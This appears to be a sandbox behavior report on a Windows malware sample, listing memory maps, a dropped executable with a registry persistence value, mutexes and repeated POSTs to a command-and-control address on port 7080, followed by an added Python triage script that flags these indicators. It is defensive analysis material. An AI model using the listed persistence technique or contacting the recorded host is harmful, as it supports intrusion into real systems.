private_0x00000000003f0000 0x003f0000 0x0047ffff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x0043ffff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True False False
private_0x0000000000430000 0x00430000 0x0046ffff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory Readable, Writable True False False
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable True False False
private_0x00000000004c0000 0x004c0000 0x005bffff Private Memory Readable, Writable True False False
pagefile_0x00000000005c0000 0x005c0000 0x0069efff Pagefile Backed Memory Readable True False False
private_0x00000000006d0000 0x006d0000 0x006dffff Private Memory Readable, Writable True False False
pagefile_0x00000000006e0000 0x006e0000 0x00867fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000870000 0x00870000 0x009f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a00000 0x00a00000 0x01dfffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01e00000 0x020cefff Memory Mapped File Readable False False False
private_0x00000000020d0000 0x020d0000 0x024a0fff Private Memory Readable, Writable True False False
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False
private_0x0000000002150000 0x02150000 0x0218ffff Private Memory Readable, Writable True False False
private_0x00000000021d0000 0x021d0000 0x022cffff Private Memory Readable, Writable True False False
private_0x0000000002330000 0x02330000 0x0236ffff Private Memory Readable, Writable True False False
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False
private_0x00000000024b0000 0x024b0000 0x025affff Private Memory Readable, Writable True False False
private_0x00000000025f0000 0x025f0000 0x0262ffff Private Memory Readable, Writable True False False
private_0x0000000002640000 0x02640000 0x0267ffff Private Memory Readable, Writable True False False
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False
private_0x0000000002800000 0x02800000 0x029affff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x0288ffff Private Memory Readable, Writable True False False
private_0x0000000002900000 0x02900000 0x0293ffff Private Memory Readable, Writable True False False
private_0x0000000002970000 0x02970000 0x029affff Private Memory Readable, Writable True False False
private_0x00000000029d0000 0x029d0000 0x02acffff Private Memory Readable, Writable True False False
private_0x0000000002ad0000 0x02ad0000 0x02bcffff Private Memory Readable, Writable True False False
private_0x0000000002bd0000 0x02bd0000 0x02d4ffff Private Memory Readable, Writable True False False
private_0x0000000002dd0000 0x02dd0000 0x02ecffff Private Memory Readable, Writable True False False
private_0x0000000002ed0000 0x02ed0000 0x02fcffff Private Memory Readable, Writable True False False
uxtheme.dll 0x73480000 0x734fffff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x73640000 0x73690fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x736a0000 0x736d1fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x736e0000 0x736f3fff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73700000 0x73707fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73710000 0x7376bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73770000 0x737aefff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x74500000 0x74537fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x74540000 0x74545fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x74550000 0x74554fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x74560000 0x74567fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74570000 0x745abfff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x745b0000 0x745c1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x745d0000 0x745dffff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x745e0000 0x745e7fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x745f0000 0x745fdfff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x74600000 0x74659fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74660000 0x74665fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x74670000 0x7467ffff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x74680000 0x74685fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x74690000 0x7469cfff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x746a0000 0x746b4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x746c0000 0x74711fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74720000 0x74726fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74730000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74750000 0x74793fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x747a0000 0x747c0fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x747d0000 0x7496dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74970000 0x749aafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x749b0000 0x749c5fff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x749e0000 0x749ecfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x749f0000 0x749fafff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74a00000 0x74a16fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74b20000 0x74b2bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74b30000 0x74b8ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x74b90000 0x74be6fff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x74c20000 0x74c22fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x74d00000 0x74d82fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x74d90000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x74e30000 0x74f3ffff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x74f40000 0x74f84fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x74f90000 0x7502cfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75030000 0x75039fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75040000 0x7513ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75140000 0x7519ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x751c0000 0x7531bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75320000 0x75f69fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75f70000 0x7605ffff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76060000 0x7606bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x760f0000 0x761e4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76250000 0x7636cfff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76370000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76440000 0x764cefff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x764d0000 0x7655ffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76700000 0x76745fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76750000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76890000 0x76a8afff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76ac0000 0x76af4fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76b00000 0x76babfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x76bb0000 0x76bc8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076bd0000 0x76bd0000 0x76cc9fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x76df0000 0x76f98fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x76fa0000 0x76fa5fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76fd0000 0x7714ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 6 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (2)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe type = size True 1
Registry (5)
Operation Key Additional Information Success Count Logfile
Write Value - value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ True 5
Fn
Module (47)
Operation | Module | Additional Information | Success | Count
Load | msvcrt.dll | base_address = 0x76b00000 | True | 1
Load | KERNEL32.dll | base_address = 0x74e30000 | True | 1
Load | USER32.dll | base_address = 0x75040000 | True | 1
Load | ADVAPI32.dll | base_address = 0x74d90000 | True | 1
Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 | True | 6
Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x20fa6c | True | 1
Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x20faa4 | True | 1
Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 | True | 1
Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x76b0dbeb | True | 1
Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x76b09894 | True | 1
Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x76b09cee | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74ee6aa8 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x74e41700 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x74e6828e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x74e44435 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x74e45929 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x74e63102 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x74e454ee | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x74e44442 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x74e41245 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x74e414b1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x74e5b6e0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x74ec42ef | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74e45a4b | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74e5eceb | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74e411c0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74e414e9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x76ffe026 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74e414c9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74e411a9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74e41809 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74e411f8 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7506ae5f | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74dba4b4 | True | 1
Create Mapping | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, protection = PAGE_READONLY, maximum_size = 0 | True | 1
Map | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ | True | 1
Service (1)
Operation | Additional Information | Success | Count
Open Manager | database_name = SERVICES_ACTIVE_DATABASE | False | 1
System (34)
Operation | Additional Information | Success | Count
Get Computer Name | result_out = YKYD69Q | True | 2
Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname | True | 1
Sleep | duration = 0 milliseconds (0.000 seconds) | True | 1
Get Time | type = Local Time, time = 2017-11-28 18:19:49 (Local Time) | True | 6
Get Time | type = Ticks, time = 21902 | True | 1
Get Time | type = Ticks, time = 21918 | True | 3
Get Time | type = Ticks, time = 23790 | True | 1
Get Time | type = Ticks, time = 28875 | True | 1
Get Time | type = Ticks, time = 29796 | True | 1
Get Time | type = Ticks, time = 30794 | True | 1
Get Time | type = Ticks, time = 31793 | True | 1
Get Time | type = Ticks, time = 32791 | True | 1
Get Time | type = Ticks, time = 33789 | True | 1
Get Time | type = Ticks, time = 34803 | True | 1
Get Time | type = Ticks, time = 35802 | True | 1
Get Time | type = Ticks, time = 36800 | True | 1
Get Time | type = Ticks, time = 37799 | True | 1
Get Time | type = Ticks, time = 38797 | True | 1
Get Time | type = Ticks, time = 39795 | True | 1
Get Info | type = Operating System | False | 1
Get Info | type = Hardware Information | True | 6
Mutex (9)
Operation | Additional Information | Success | Count
Create | mutex_name = Global\I705BA84C | True | 1
Create | mutex_name = Global\M705BA84C | True | 1
Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE | False | 6
Release | mutex_name = Global\I705BA84C | True | 1
Network Behavior
HTTP Sessions (6)
Information | Value
Total Data Sent | 1.94 KB (1986 bytes)
Total Data Received | 0.76 KB (780 bytes)
Contacted Host Count | 1
Contacted Hosts | 173.201.20.6
HTTP Session #1
Information | Value
User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name | 173.201.20.6
Server Port | 7080
Data Sent | 0.32 KB (331 bytes)
Data Received | 0.15 KB (156 bytes)
Operations
Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG | True | 1
Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 | True | 1
Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD | True | 1
Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 | True | 1
Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 | True | 1
Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 | True | 1
Read Response | size = 148, size_out = 148 | True | 1
Read Response | size = 0, size_out = 0 | True | 1
Close Session | - | True | 5
HTTP Sessions #2 to #5
Identical to HTTP Session #1 in every recorded field: the same User Agent, Server Name 173.201.20.6, Server Port 7080, Data Sent 0.32 KB (331 bytes), Data Received 0.15 KB (156 bytes), and the same sequence of operations (Open Session, Open Connection, Open HTTP Request with http_verb = POST, Send HTTP Request, two Query HTTP Info calls for status code and content length, Read Response of 148 bytes followed by a 0-byte read, Close Session) with the same success flags and counts.
HTTP Session #6
Information | Value
User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name | 173.201.20.6
Server Port | 7080
Data Sent | 0.32 KB (331 bytes)
Data Received | 0.00 KB (0 bytes)
Operations
Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG | True | 1
Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 | True | 1
Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD | True | 1
Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 | False | 1
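The report above is a flat dump of behavior rows, and the indicators worth pivoting on (the dropped executable, the registry value that points at it, the mutex names, the repeated POSTs to one bare IP on port 7080, the roughly one-second tick polling) are scattered across several tables. The following is an added example, not part of the VMRay report and not VMRay code: a small Python parser for rows in this page's layout (Operation, optional target path or module, comma-separated key = value pairs, then the Success and Count columns) plus a handful of triage heuristics of my own. The sample input is a constructed subset of the rows shown above; the heuristics (an .exe created under AppData\Local and then named in a REG_SZ value, a bare IPv4 contacted on a non-standard HTTP port, VirtualAlloc and VirtualProtect looked up by name at run time, the median gap between Ticks readings) are assumptions about what is worth flagging, not the sandbox's own scoring.

```python
"""Parse VMRay-style grouped-behavior rows and apply a few triage heuristics.

Added example, not part of the report: the row grammar is inferred from the page
layout and the heuristics are the author's own, not the sandbox's scoring.
"""
import re
from collections import Counter
from statistics import median

# Constructed sample: a subset of the report's rows, one per line, 'Fn' links dropped.
SAMPLE_REPORT = r"""
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Write Value - value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ True 5
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x20fb14 True 1
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x20fb14 True 1
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x74e5b6e0 True 1
Get Time type = Ticks, time = 30794 True 1
Get Time type = Ticks, time = 31793 True 1
Get Time type = Ticks, time = 32791 True 1
Get Time type = Ticks, time = 33789 True 1
Create mutex_name = Global\I705BA84C True 1
Create mutex_name = Global\M705BA84C True 1
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI True 1
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
"""

# A row is: operation (optionally followed by a target path/module), 'key = value' pairs,
# then the Success flag and the Count column.
ROW_RE = re.compile(r'^(?P<op>.+?) (?P<kv>\w+ = .+?) (?P<ok>True|False) (?P<count>\d+)$')
# 'key = value' pairs; a value may be quoted or may itself contain commas (flag lists).
KV_RE = re.compile(r'(\w+) = (?:"([^"]*)"|(.*?))(?=, \w+ = |$)')
FILE_CREATE_RE = re.compile(r'^Create (?P<path>[A-Za-z]:\\.+)$')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
COMMON_HTTP_PORTS = {'80', '443', '8080'}  # assumption: anything else is worth a look


def parse_rows(text):
    """Turn report lines into dicts {'op', 'kv', 'ok', 'count'}; lines that are not rows are skipped."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        kv = {k: quoted if quoted else bare for k, quoted, bare in KV_RE.findall(m.group('kv'))}
        rows.append({'op': m.group('op'), 'kv': kv,
                     'ok': m.group('ok') == 'True', 'count': int(m.group('count'))})
    return rows


def dropped_executables(rows):
    """File 'Create' rows whose target is an .exe under the user's AppData\\Local tree."""
    hits = []
    for r in rows:
        m = FILE_CREATE_RE.match(r['op'])
        if m and m.group('path').lower().endswith('.exe') \
                and '\\appdata\\local\\' in m.group('path').lower():
            hits.append(m.group('path'))
    return hits


def persistence_values(rows, dropped):
    """Registry 'Write Value' rows whose REG_SZ data names one of the dropped files."""
    targets = {p.lower() for p in dropped}
    return [(r['kv']['value_name'], r['kv']['data']) for r in rows
            if r['op'].startswith('Write Value') and r['kv'].get('type') == 'REG_SZ'
            and r['kv'].get('data', '').lower() in targets]


def suspicious_connections(rows):
    """'Open Connection' rows to a bare IPv4 address on a non-standard HTTP port, with counts."""
    counts = Counter((r['kv']['server_name'], r['kv']['server_port'])
                     for r in rows if r['op'] == 'Open Connection')
    return {f'{host}:{port}': n for (host, port), n in counts.items()
            if IPV4_RE.match(host) and port not in COMMON_HTTP_PORTS}


def poll_interval_ms(rows):
    """Median gap between consecutive 'Get Time type = Ticks' readings (None if fewer than two)."""
    ticks = sorted(int(r['kv']['time']) for r in rows
                   if r['op'] == 'Get Time' and r['kv'].get('type') == 'Ticks')
    return median(b - a for a, b in zip(ticks, ticks[1:])) if len(ticks) > 1 else None


def resolves_memory_apis_at_runtime(rows):
    """Heuristic: VirtualAlloc and VirtualProtect both looked up by name (common in unpacking stubs)."""
    seen = {r['kv'].get('function') for r in rows if r['op'].startswith('Get Address')}
    return {'VirtualAlloc', 'VirtualProtect'} <= seen


def mutexes(rows):
    """Names passed to mutex 'Create' rows, sorted."""
    return sorted(r['kv']['mutex_name'] for r in rows
                  if r['op'] == 'Create' and 'mutex_name' in r['kv'])


def analyse(text):
    rows = parse_rows(text)
    dropped = dropped_executables(rows)
    return {'dropped': dropped,
            'persistence': persistence_values(rows, dropped),
            'mutexes': mutexes(rows),
            'c2': suspicious_connections(rows),
            'poll_interval_ms': poll_interval_ms(rows),
            'runtime_memory_api_resolution': resolves_memory_apis_at_runtime(rows)}


if __name__ == '__main__':
    for key, value in analyse(SAMPLE_REPORT).items():
        print(f'{key}: {value}')
```

Run against the sample it reports the dropped path, the systeminfo value pointing at it, the two Global\ mutexes, 173.201.20.6:7080 with two connection attempts, a median tick gap of 998 ms, and the run-time resolution flag set. The key/value regex stops a value only at the next ", word = " boundary, so flag lists such as the INTERNET_FLAG_* set survive intact; the report's Key column for the registry write is "-", so the parser deliberately does not guess which key the value was written under.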